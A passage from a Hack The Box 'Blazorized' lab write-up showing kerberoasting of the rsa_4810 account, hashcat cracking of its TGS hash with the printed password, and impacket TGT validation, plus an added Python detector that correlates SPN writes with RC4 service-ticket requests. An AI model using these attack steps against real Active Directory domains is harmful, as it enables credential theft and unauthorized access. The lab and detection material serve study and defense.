Kerberoasting


While running the adPEAS script, I discovered that the rsa_4810 account is kerberoastable.

BloodHound confirmed this at a later stage: the current user, nu_1055, has the WriteSPN privilege over the rsa_4810 account.

Password Cracking


┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ hashcat -a 0 -m 13100 rsa_4810.hash /usr/share/wordlists/rockyou.txt 
hashcat (v6.2.6) starting
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 1 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344386
* Bytes.....: 139921519
* Keyspace..: 14344386
 
$krb5tgs$23$*RSA_4810$blazorized.htb$http:/RSA_4810*$b3afe5d5eb5e5bddb354173d37c530ea$...:(Ni7856Do9854Ki05Ng0005 #)
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 13100 (Kerberos 5, etype 23, TGS-REP)
Hash.Target......: $krb5tgs$23$*RSA_4810$blazorized.htb$http:/RSA_4810...dade02
Time.Started.....: Tue Jul  2 16:35:33 2024 (7 secs)
Time.Estimated...: Tue Jul  2 16:35:40 2024 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2156.1 kH/s (0.84ms) @ Accel:512 Loops:1 Thr:1 Vec:8
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 14321664/14344386 (99.84%)
Rejected.........: 0/14321664 (0.00%)
Restore.Point....: 14318592/14344386 (99.82%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: (choupette69) -> ((alexa22))
Hardware.Mon.#1..: Util: 58%
 
Started: Tue Jul  2 16:35:18 2024
Stopped: Tue Jul  2 16:35:41 2024

hashcat cracked the password hash. The cracked password for the rsa_4810 account is (Ni7856Do9854Ki05Ng0005 #)
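
Defender-side view of the activity above, as an added example that is not part of the original writeup: it correlates an SPN write (Security event 5136) with a following RC4 (0x17, etype 23) service-ticket request (event 4769) for the same account. The sample events, the 30-minute window, the accounts svc_backup and sql_svc, and the CN-equals-sAMAccountName mapping are constructed assumptions.

```python
from datetime import datetime, timedelta

RC4_HMAC = "0x17"                # etype 23, the type hashcat mode 13100 targets
SPN_ADDED = "%%14674"            # 5136 OperationType: Value Added
WINDOW = timedelta(minutes=30)   # assumed correlation window

# Constructed sample events (simplified field subsets of Security 5136 / 4769).
EVENTS = [
    {"id": 5136, "time": "2024-07-02T16:20:11", "SubjectUserName": "nu_1055",
     "ObjectDN": "CN=RSA_4810,CN=Users,DC=blazorized,DC=htb",
     "AttributeLDAPDisplayName": "servicePrincipalName", "OperationType": SPN_ADDED},
    {"id": 4769, "time": "2024-07-02T16:21:03", "TargetUserName": "nu_1055@BLAZORIZED.HTB",
     "ServiceName": "RSA_4810", "TicketEncryptionType": "0x17"},
    {"id": 4769, "time": "2024-07-02T16:25:40", "TargetUserName": "nu_1055@BLAZORIZED.HTB",
     "ServiceName": "DC1$", "TicketEncryptionType": "0x12"},
    {"id": 4769, "time": "2024-07-02T16:26:02", "TargetUserName": "svc_backup@BLAZORIZED.HTB",
     "ServiceName": "sql_svc", "TicketEncryptionType": "0x17"},
]

def cn_of(dn):
    """First RDN value of a DN; assumes CN equals sAMAccountName and has no escaped commas."""
    return dn.split(",", 1)[0].split("=", 1)[1].lower()

def detect(events, window=WINDOW):
    """Alert on RC4 service tickets for user accounts; escalate when an SPN was just written."""
    spn_writes = {}  # account -> [(time, writer)]
    alerts = []
    for ev in sorted(events, key=lambda e: e["time"]):
        t = datetime.fromisoformat(ev["time"])
        is_spn = ev.get("AttributeLDAPDisplayName", "").lower() == "serviceprincipalname"
        if ev["id"] == 5136 and is_spn and ev["OperationType"] == SPN_ADDED:
            writer = ev["SubjectUserName"].lower()
            spn_writes.setdefault(cn_of(ev["ObjectDN"]), []).append((t, writer))
        elif ev["id"] == 4769 and ev["TicketEncryptionType"].lower() == RC4_HMAC:
            svc = ev["ServiceName"].lower()
            if svc.endswith("$") or svc == "krbtgt":
                continue  # machine accounts and krbtgt use long random secrets
            requester = ev["TargetUserName"].split("@")[0].lower()
            # SPN writes by someone other than the account itself, inside the window
            writers = [w for wt, w in spn_writes.get(svc, []) if t - wt <= window and w != svc]
            kind = "targeted-kerberoast" if writers else "rc4-service-ticket"
            alerts.append({"kind": kind, "service": svc, "requester": requester,
                           "spn_writer": writers[-1] if writers else None})
    return alerts

if __name__ == "__main__":
    for alert in detect(EVENTS):
        print(alert)
```

Event 5136 is only logged when Directory Service Changes auditing is enabled and the object has a matching SACL, so the escalated alert depends on that audit policy being in place.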

Validation


┌──(kali㉿kali)-[~/archive/htb/labs/blazorized]
└─$ impacket-getTGT 'BLAZORIZED.HTB/rsa_4810@dc1.blazorized.htb' -k -dc-ip $IP 
Impacket v0.12.0.dev1 - Copyright 2023 Fortra
 
Password: (Ni7856Do9854Ki05Ng0005 #)
[*] Saving ticket in rsa_4810@dc1.blazorized.htb.ccache

Validated: a TGT was generated for the rsa_4810 account. Since the user is part of the Remote Management Users group, I can just WinRM to the target system.